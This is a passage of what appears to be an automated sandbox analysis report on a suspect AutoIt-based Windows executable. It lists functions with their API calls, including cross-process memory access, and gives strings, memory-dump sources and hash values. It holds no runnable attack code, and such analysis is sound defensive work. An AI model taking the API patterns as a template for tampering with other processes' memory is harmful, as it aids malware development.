                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00DD2760
                                                • Part of subcall function 00DDB3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00DD21FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00DDB3F8
                                                • Part of subcall function 00DDB32A: GetWindowThreadProcessId.USER32(?,?), ref: 00DDB355
                                                • Part of subcall function 00DDB32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00DD2194,00000034,?,?,00001004,00000000,00000000), ref: 00DDB365
                                                • Part of subcall function 00DDB32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00DD2194,00000034,?,?,00001004,00000000,00000000), ref: 00DDB37B
                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00DD27CD
                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00DD281A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                              • String ID: @
                                              • API String ID: 4150878124-2766056989
                                              • Opcode ID: ba57166e1101fefd9a59682a1dbcfd34862bed014c3cc292fa428072393764ca
                                              • Instruction ID: 7423608a9af96fbfb9606642575d82467e5da14bef601ce50754fb88f1d1a318
                                              • Opcode Fuzzy Hash: ba57166e1101fefd9a59682a1dbcfd34862bed014c3cc292fa428072393764ca
                                              • Instruction Fuzzy Hash: 43413C72900218BEDB10DBA4CC41AEEBBB8EB05714F104056EA55B7281DB716E85DBA1
                                              Function 00DA172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\qlG7x91YXH.exe,00000104), ref: 00DA1769
                                              • _free.LIBCMT ref: 00DA1834
                                              • _free.LIBCMT ref: 00DA183E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: _free$FileModuleName
                                              • String ID: C:\Users\user\Desktop\qlG7x91YXH.exe
                                              • API String ID: 2506810119-2142809231
                                              • Opcode ID: 223fe266accfad9245829b5b911898c59503ba0c17e14df8738736f7fecac2aa
                                              • Instruction ID: b48d844d9962b080cb74f596bbccc3156d276c0ada9b5f7297566f97d465f6ce
                                              • Opcode Fuzzy Hash: 223fe266accfad9245829b5b911898c59503ba0c17e14df8738736f7fecac2aa
                                              • Instruction Fuzzy Hash: A631A279A44218FFCB21DFA99881D9EBBFCEB86310F1441A6F404D7211D6B08E81DBB4
                                              Function 00DDC27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00DDC306
                                              • DeleteMenu.USER32(?,00000007,00000000), ref: 00DDC34C
                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00E41990,00FC5908), ref: 00DDC395
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Menu$Delete$InfoItem
                                              • String ID: 0
                                              • API String ID: 135850232-4108050209
                                              • Opcode ID: 4c150814171d816d23721fc9692c41c191320fa743cf249049f4dc144f784d32
                                              • Instruction ID: a1128744710fdf9dd2bd4cfe9758bee3c89078061ff56f9f447370c6a8629530
                                              • Opcode Fuzzy Hash: 4c150814171d816d23721fc9692c41c191320fa743cf249049f4dc144f784d32
                                              • Instruction Fuzzy Hash: 43418D712143429FDB24DF29D884B1ABBA4EF85320F14961EE9A5973D1D730E904CB72
                                              Function 00E04416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00E0CC08,00000000,?,?,?,?), ref: 00E044AA
                                              • GetWindowLongW.USER32 ref: 00E044C7
                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00E044D7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Window$Long
                                              • String ID: SysTreeView32
                                              • API String ID: 847901565-1698111956
                                              • Opcode ID: a3f5c350bf3f1dfcc55a46c7eafacd0621968ec71677771acebe18e41c645522
                                              • Instruction ID: c0778ae5aed117eddc54bce4f487d6a596ed68914ba3983fc7ebb68c2765c7e7
                                              • Opcode Fuzzy Hash: a3f5c350bf3f1dfcc55a46c7eafacd0621968ec71677771acebe18e41c645522
                                              • Instruction Fuzzy Hash: CE31BEB1200205AFDF219F78DC45BEA7BA9EB08338F205315FA79A21D0D771EC909760
                                              Function 00DF304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00DF335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00DF3077,?,?), ref: 00DF3378
                                              • inet_addr.WS2_32(?), ref: 00DF307A
                                              • _wcslen.LIBCMT ref: 00DF309B
                                              • htons.WS2_32(00000000), ref: 00DF3106
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                              • String ID: 255.255.255.255
                                              • API String ID: 946324512-2422070025
                                              • Opcode ID: 68b5d865669eca64067e067221555903b8010cfcd9b54bfe1398ad9928f428c4
                                              • Instruction ID: bea8db0c56ed2a581259018e6ecea001bb629eb9c60464bd9b0b2aead0aec86c
                                              • Opcode Fuzzy Hash: 68b5d865669eca64067e067221555903b8010cfcd9b54bfe1398ad9928f428c4
                                              • Instruction Fuzzy Hash: 0231A1356002099FCB10CF68C485E7A77E0EF54358F2AC059EA158B392DB72EE45C771
                                              Function 00E04653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00E04705
                                              • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00E04713
                                              • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00E0471A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: MessageSend$DestroyWindow
                                              • String ID: msctls_updown32
                                              • API String ID: 4014797782-2298589950
                                              • Opcode ID: 9be9f3c5f78a7675f6ecf10fd568b76740139e29201885b51bfd6db030b4db6e
                                              • Instruction ID: 9003922e39e1373bee823094f6a0a2fd16e0c82aee64eb62e27b4babceb23fd2
                                              • Opcode Fuzzy Hash: 9be9f3c5f78a7675f6ecf10fd568b76740139e29201885b51bfd6db030b4db6e
                                              • Instruction Fuzzy Hash: 852181F5600209AFDB10DF68DD91DA737ADEF9A358B041049F600A72A1DB71EC91CA70
                                              Function 00DD95AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: _wcslen
                                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                              • API String ID: 176396367-2734436370
                                              • Opcode ID: 99c81fcf2a76b25d3e4ef951d6392bec5ed3fcb6431532981c849e8babfff86f
                                              • Instruction ID: 299014e1bae53b3164460c929cc915466821e7c03a8983d485557286468557bf
                                              • Opcode Fuzzy Hash: 99c81fcf2a76b25d3e4ef951d6392bec5ed3fcb6431532981c849e8babfff86f
                                              • Instruction Fuzzy Hash: FA21383220425166C731BB249C22FBBF398DF51710F184437F94997285EB56ED92C3B5
                                              Function 00E037B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00E03840
                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00E03850
                                              • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00E03876
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: MessageSend$MoveWindow
                                              • String ID: Listbox
                                              • API String ID: 3315199576-2633736733
                                              • Opcode ID: 4ce222513808466bc14ee9e0c5e7c29fc506c781124fb3be0bb57001a83669c9
                                              • Instruction ID: a860233e8b4ccff0529386b9d50ee866ea43538fd323a7ed1410828f6ed4ef19
                                              • Opcode Fuzzy Hash: 4ce222513808466bc14ee9e0c5e7c29fc506c781124fb3be0bb57001a83669c9
                                              • Instruction Fuzzy Hash: 5C21DE72600218BFEF218F65CC81EAB376EEF89754F109125F944AB1D0CA72DC9287A0
                                              Function 00DE49F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetErrorMode.KERNEL32(00000001), ref: 00DE4A08
                                              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00DE4A5C
                                              • SetErrorMode.KERNEL32(00000000,?,?,00E0CC08), ref: 00DE4AD0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ErrorMode$InformationVolume
                                              • String ID: %lu
                                              • API String ID: 2507767853-685833217
                                              • Opcode ID: 8dd82b97ee4bd6d8e431668906f8f4da767f360ff012710263a8e040bcf93652
                                              • Instruction ID: fe454761d0f91dcabbafa25973a397ec7953d06cf720b65b400c348cf94f8a80
                                              • Opcode Fuzzy Hash: 8dd82b97ee4bd6d8e431668906f8f4da767f360ff012710263a8e040bcf93652
                                              • Instruction Fuzzy Hash: 86315375A00109AFDB10DF55C985EAABBF8EF08318F1480A5F509EB252D771ED45CB71
                                              Function 00E041EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00E0424F
                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00E04264
                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00E04271
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: msctls_trackbar32
                                              • API String ID: 3850602802-1010561917
                                              • Opcode ID: ec0073170520f4eba235556bad8b006d5bc6b6d8167e99021b73c80a95334755
                                              • Instruction ID: 88543b3bf01b5f9afd5948c067ef6d8f63c3d4f9743dc5980743b2bc6eaf11b1
                                              • Opcode Fuzzy Hash: ec0073170520f4eba235556bad8b006d5bc6b6d8167e99021b73c80a95334755
                                              • Instruction Fuzzy Hash: 9E11A3B1340248BEEF205F69CC06FAB3BACEF95B58F111518FA55F60E0D671D8A19B20
                                              Function 00DD2F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00D76B57: _wcslen.LIBCMT ref: 00D76B6A
                                                • Part of subcall function 00DD2DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00DD2DC5
                                                • Part of subcall function 00DD2DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DD2DD6
                                                • Part of subcall function 00DD2DA7: GetCurrentThreadId.KERNEL32 ref: 00DD2DDD
                                                • Part of subcall function 00DD2DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00DD2DE4
                                              • GetFocus.USER32 ref: 00DD2F78
                                                • Part of subcall function 00DD2DEE: GetParent.USER32(00000000), ref: 00DD2DF9
                                              • GetClassNameW.USER32(?,?,00000100), ref: 00DD2FC3
                                              • EnumChildWindows.USER32(?,00DD303B), ref: 00DD2FEB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                              • String ID: %s%d
                                              • API String ID: 1272988791-1110647743
                                              • Opcode ID: ca1251244f0d00a16864a5bc2dcd564f0a4ec1884fa6138f328a4e7211c012fe
                                              • Instruction ID: cb68c1518a8f41171e7da23e222cbdc3efa276fc8e9a3b32cecef395c3ebb089
                                              • Opcode Fuzzy Hash: ca1251244f0d00a16864a5bc2dcd564f0a4ec1884fa6138f328a4e7211c012fe
                                              • Instruction Fuzzy Hash: E511E4712002056BCF247F709C86EFD376AEFA4304F148076F909AB292EE319A49CB70
                                              Function 00E05882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00E058C1
                                              • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00E058EE
                                              • DrawMenuBar.USER32(?), ref: 00E058FD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Menu$InfoItem$Draw
                                              • String ID: 0
                                              • API String ID: 3227129158-4108050209
                                              • Opcode ID: 8023c3d550df477f8606c17440dccd1260b629622cece64005bae184fd4109b9
                                              • Instruction ID: 4f722820af6a7c6d91536fa6f656b5ca7bab9270699fa0a8d9a7a7679ec33a57
                                              • Opcode Fuzzy Hash: 8023c3d550df477f8606c17440dccd1260b629622cece64005bae184fd4109b9
                                              • Instruction Fuzzy Hash: A2013536500218EEDB219F51DC44BABBBB4FB85365F1080A9E859E6191DB308AD4EF31
                                              Function 00DD007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9937649dd65c5e7e07bc2ca43804987a5f616458977048fa195fa7edd1e63b49
                                              • Instruction ID: 54f604a50c128869272fb731f8cb069d1eb25ac76549ce8d382332ca54d1de77
                                              • Opcode Fuzzy Hash: 9937649dd65c5e7e07bc2ca43804987a5f616458977048fa195fa7edd1e63b49
                                              • Instruction Fuzzy Hash: F5C12A75A00206AFDB14CFA8C894BAEBBB5FF88704F248599E505EB251D731DE41CBA4
                                              Function 00DF342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Variant$ClearInitInitializeUninitialize
                                              • String ID:
                                              • API String ID: 1998397398-0
                                              • Opcode ID: 2d3b19e487fdd0224097c220fc1a69f88dc2f9aeac90ad78e1687be6dcae84bc
                                              • Instruction ID: c1e41ec9c78bec429dd744c7df617a496e39d11593ab9b022492f3d038fd2a7f
                                              • Opcode Fuzzy Hash: 2d3b19e487fdd0224097c220fc1a69f88dc2f9aeac90ad78e1687be6dcae84bc
                                              • Instruction Fuzzy Hash: D4A11B756042049FC710EF28C485A2AB7E5FF88714F16C959F9899B362DB30EE45CBB1
                                              Function 00DD0436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                              Download Yara Rule
                                              APIs
                                              • ProgIDFromCLSID.COMBASE(?,00000000), ref: 00DD05F0
                                              • CoTaskMemFree.COMBASE(00000000), ref: 00DD0608
                                              • CLSIDFromProgID.COMBASE(?,?), ref: 00DD062D
                                              • _memcmp.LIBVCRUNTIME ref: 00DD064E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
